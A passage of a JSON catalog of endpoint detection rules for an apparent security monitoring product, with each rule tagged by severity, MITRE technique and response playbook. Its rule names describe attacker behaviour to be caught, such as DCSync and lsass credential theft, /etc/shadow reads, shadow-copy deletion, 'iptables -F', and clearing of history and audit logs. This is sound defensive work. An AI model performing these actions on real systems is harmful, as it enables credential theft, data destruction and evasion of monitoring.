Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.006" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-dcsync-via-replication.yaml" }, { "id": "det-endpoint-102", "type": "detection", "name": "Kerberos AS-REP Roasting Pattern", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Kerberos AS-REP Roasting Pattern'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1558.004" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-kerberos-asrep-roast.yaml" }, { "id": "det-endpoint-103", "type": "detection", "name": "net localgroup administrators Enumerated", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'net localgroup administrators Enumerated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1087.001" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-net-localgroup-administrators.yaml" }, { "id": "det-endpoint-104", "type": "detection", "name": "net group \"Domain Admins\" Enumerated", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'net group \"Domain Admins\" Enumerated'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-net-group-domain-admins.yaml" }, { "id": "det-endpoint-105", "type": "detection", "name": "nltest /domain_trusts Enumerated", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'nltest /domain_trusts Enumerated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1482" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-nltest-domain-trusts.yaml" }, { "id": "det-endpoint-106", "type": "detection", "name": "AdFind.exe Enumeration Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AdFind.exe Enumeration Detected'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-adfind-enumeration.yaml" }, { "id": "det-endpoint-107", "type": "detection", "name": "SharpHound Collection Run Detected", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SharpHound Collection Run Detected'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1087.002" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-bloodhound-sharphound.yaml" }, { "id": "det-endpoint-108", "type": "detection", "name": "arp -a Enumeration By Workstation", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'arp -a Enumeration By Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-arp-cache-enum.yaml" }, { "id": "det-endpoint-109", "type": "detection", "name": "route print Run From Workstation", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'route print Run From Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-route-print.yaml" }, { "id": "det-endpoint-110", "type": "detection", "name": "net view Used To Enumerate File Shares", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'net view Used To Enumerate File Shares'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1135" ], "log_source": "windows", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-net-share-enum.yaml" }, { "id": "det-endpoint-111", "type": "detection", "name": "PsExec.exe Service Created On Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PsExec.exe Service Created On Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.002" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-psexec-execution-host.yaml" }, { "id": "det-endpoint-112", "type": "detection", "name": "PSEXESVC Service Created (Remote PsExec)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PSEXESVC Service Created (Remote PsExec)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.002" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-psexesvc-service-create.yaml" }, { "id": "det-endpoint-113", "type": "detection", "name": "PAExec Service Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PAExec Service Created'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.002" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-paexec-service-create.yaml" }, { "id": "det-endpoint-114", "type": "detection", "name": "WinRM Shell From Workstation To DC", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'WinRM Shell From Workstation To DC'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.006" ], "log_source": "windows", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-winrm-shell-from-workstation.yaml" }, { "id": "det-endpoint-115", "type": "detection", "name": "Process Hollowing Marker (CreateProcess Suspended + Unmapped)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Process Hollowing Marker (CreateProcess Suspended + Unmapped)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1055.012" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-process-hollowing-marker.yaml" }, { "id": "det-endpoint-116", "type": "detection", "name": "CreateRemoteThread Targeting lsass.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'CreateRemoteThread Targeting lsass.exe'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1055.001" ], "log_source": "windows", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-create-remote-thread-lsass.yaml" }, { "id": "det-endpoint-117", "type": "detection", "name": "Suspicious CreateRemoteThread Into explorer.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Suspicious CreateRemoteThread Into explorer.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1055" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-suspicious-thread-into-explorer.yaml" }, { "id": "det-endpoint-118", "type": "detection", "name": "cipher.exe /w Used (Secure Delete)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'cipher.exe /w Used (Secure Delete)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1485" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-cipher-w-secure-delete.yaml" }, { "id": "det-endpoint-119", "type": "detection", "name": "format Command Used Against Drive", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'format Command Used Against Drive'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1485" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-format-com-quick.yaml" }, { "id": "det-endpoint-120", "type": "detection", "name": "icacls Used To Deny Access On System Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'icacls Used To Deny Access On System Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1222.001" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-icacls-deny-readonly.yaml" }, { "id": "det-endpoint-121", "type": "detection", "name": "takeown.exe Used Against System Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'takeown.exe Used Against System Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1222.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-takeown-system-path.yaml" }, { "id": "det-endpoint-122", "type": "detection", "name": "rundll32.exe shell32 Control_RunDLL Used Suspiciously", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rundll32.exe shell32 Control_RunDLL Used Suspiciously'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1218.011" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-rundll32-shell32-controlrunDLL.yaml" }, { "id": "det-endpoint-123", "type": "detection", "name": "Burst Of File Extension Renames To Common Ransom Markers", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Burst Of File Extension Renames To Common Ransom Markers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1486" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-ransomware-ext-rename-burst.yaml" }, { "id": "det-endpoint-124", "type": "detection", "name": "Mass Shadow Copy Deletion Via WMI", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Mass Shadow Copy Deletion Via WMI'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": "windows", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-shadow-copy-mass-delete.yaml" }, { "id": "det-endpoint-125", "type": "detection", "name": "Office Application Spawned mshta.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Office Application Spawned mshta.exe'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.005" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-office-spawn-mshta.yaml" }, { "id": "det-endpoint-126", "type": "detection", "name": "Office Application Spawned rundll32.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Office Application Spawned rundll32.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.011" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-office-spawn-rundll32.yaml" }, { "id": "det-endpoint-127", "type": "detection", "name": "OneNote Spawned cmd.exe", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'OneNote Spawned cmd.exe'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1204.002" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-onenote-spawn-cmd.yaml" }, { "id": "det-endpoint-128", "type": "detection", "name": "PDF Reader Spawned Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'PDF Reader Spawned Shell'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1204.002" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-pdfreader-spawn-shell.yaml" }, { "id": "det-endpoint-129", "type": "detection", "name": "ISO File Mounted From User Temp", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ISO File Mounted From User Temp'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1204.002" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-iso-mount-from-temp.yaml" }, { "id": "det-endpoint-130", "type": "detection", "name": "LNK File Executed From Removable Media", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'LNK File Executed From Removable Media'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1204.002" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-lnk-file-from-removable.yaml" }, { "id": "det-endpoint-131", "type": "detection", "name": "Systemd Unit File Written By Non-Package Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Systemd Unit File Written By Non-Package Process'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.002" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-systemd-service-create-untrusted.yaml" }, { "id": "det-endpoint-132", "type": "detection", "name": "Systemd Timer Unit Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Systemd Timer Unit Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-systemd-timer-create.yaml" }, { "id": "det-endpoint-133", "type": "detection", "name": "File Written Into /etc/cron.d Outside Package Mgr", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'File Written Into /etc/cron.d Outside Package Mgr'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.003" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-cron-d-write.yaml" }, { "id": "det-endpoint-134", "type": "detection", "name": "Anacron Job File Added", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Anacron Job File Added'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053.003" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-anacron-job-add.yaml" }, { "id": "det-endpoint-135", "type": "detection", "name": "at Job Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'at Job Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053.001" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-at-job-create.yaml" }, { "id": "det-endpoint-136", "type": "detection", "name": "/etc/rc.local Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/rc.local Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1037.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-rclocal-modified.yaml" }, { "id": "det-endpoint-137", "type": "detection", "name": "/etc/init.d/ Script Added By Non-Pkg Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/init.d/ Script Added By Non-Pkg Process'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1037.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-initd-script-add.yaml" }, { "id": "det-endpoint-138", "type": "detection", "name": "~/.bashrc Modified By Other User", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '~/.bashrc Modified By Other User'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-bashrc-modified-by-other-user.yaml" }, { "id": "det-endpoint-139", "type": "detection", "name": "~/.zshrc Modified By Other User", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '~/.zshrc Modified By Other User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1546.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-zshrc-modified-by-other-user.yaml" }, { "id": "det-endpoint-140", "type": "detection", "name": "/etc/pam.d/ Configuration Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/pam.d/ Configuration Modified'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1556.003" ], "log_source": "linux", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-pam-d-modified.yaml" }, { "id": "det-endpoint-141", "type": "detection", "name": "NSS Module Installed In /usr/lib", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'NSS Module Installed In /usr/lib'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1556" ], "log_source": "linux", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-nss-module-installed.yaml" }, { "id": "det-endpoint-142", "type": "detection", "name": "New File Added Under /etc/sudoers.d/", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'New File Added Under /etc/sudoers.d/'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-sudoers-d-add.yaml" }, { "id": "det-endpoint-143", "type": "detection", "name": "Sudoers File Granted NOPASSWD Privilege", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Sudoers File Granted NOPASSWD Privilege'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.003" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-nopasswd-sudo-line.yaml" }, { "id": "det-endpoint-144", "type": "detection", "name": "Multiple Authorized Keys Appended In Short Window", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Multiple Authorized Keys Appended In Short Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-authorized-keys-bulk-append.yaml" }, { "id": "det-endpoint-145", "type": "detection", "name": "sshd_config PermitRootLogin Set To Yes", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'sshd_config PermitRootLogin Set To Yes'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1556.004" ], "log_source": "linux", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ssh-config-permitrootlogin-yes.yaml" }, { "id": "det-endpoint-146", "type": "detection", "name": "auditd Service Stopped", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'auditd Service Stopped'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.012" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-stopped.yaml" }, { "id": "det-endpoint-147", "type": "detection", "name": "auditctl Used To Disable Audit Rules", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'auditctl Used To Disable Audit Rules'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.012" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditctl-disable.yaml" }, { "id": "det-endpoint-148", "type": "detection", "name": "rsyslog Configuration File Removed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'rsyslog Configuration File Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-syslog-config-removed.yaml" }, { "id": "det-endpoint-149", "type": "detection", "name": "/var/log/wtmp Or /var/log/btmp Modified Suspiciously", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/var/log/wtmp Or /var/log/btmp Modified Suspiciously'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070.002" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-utmp-tampering.yaml" }, { "id": "det-endpoint-150", "type": "detection", "name": "Bash History File Truncated Or Removed", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Bash History File Truncated Or Removed'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070.003" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-history-cleared.yaml" }, { "id": "det-endpoint-151", "type": "detection", "name": "HISTFILE Set To /dev/null", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'HISTFILE Set To /dev/null'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070.003" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-history-disabled-export.yaml" }, { "id": "det-endpoint-152", "type": "detection", "name": "SELinux Set To Permissive", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SELinux Set To Permissive'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-selinux-permissive.yaml" }, { "id": "det-endpoint-153", "type": "detection", "name": "AppArmor Profile Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AppArmor Profile Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-apparmor-disabled.yaml" }, { "id": "det-endpoint-154", "type": "detection", "name": "iptables -F Used To Flush Rules", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'iptables -F Used To Flush Rules'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-iptables-flush.yaml" }, { "id": "det-endpoint-155", "type": "detection", "name": "ufw Firewall Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ufw Firewall Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-ufw-disable.yaml" }, { "id": "det-endpoint-156", "type": "detection", "name": "/etc/shadow Read By Non-Root Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/shadow Read By Non-Root Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.008" ], "log_source": "linux", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-shadow-read.yaml" }, { "id": "det-endpoint-157", "type": "detection", "name": "/etc/passwd Modified By Non-Pkg Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by '/etc/passwd Modified By Non-Pkg Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1136.001" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": 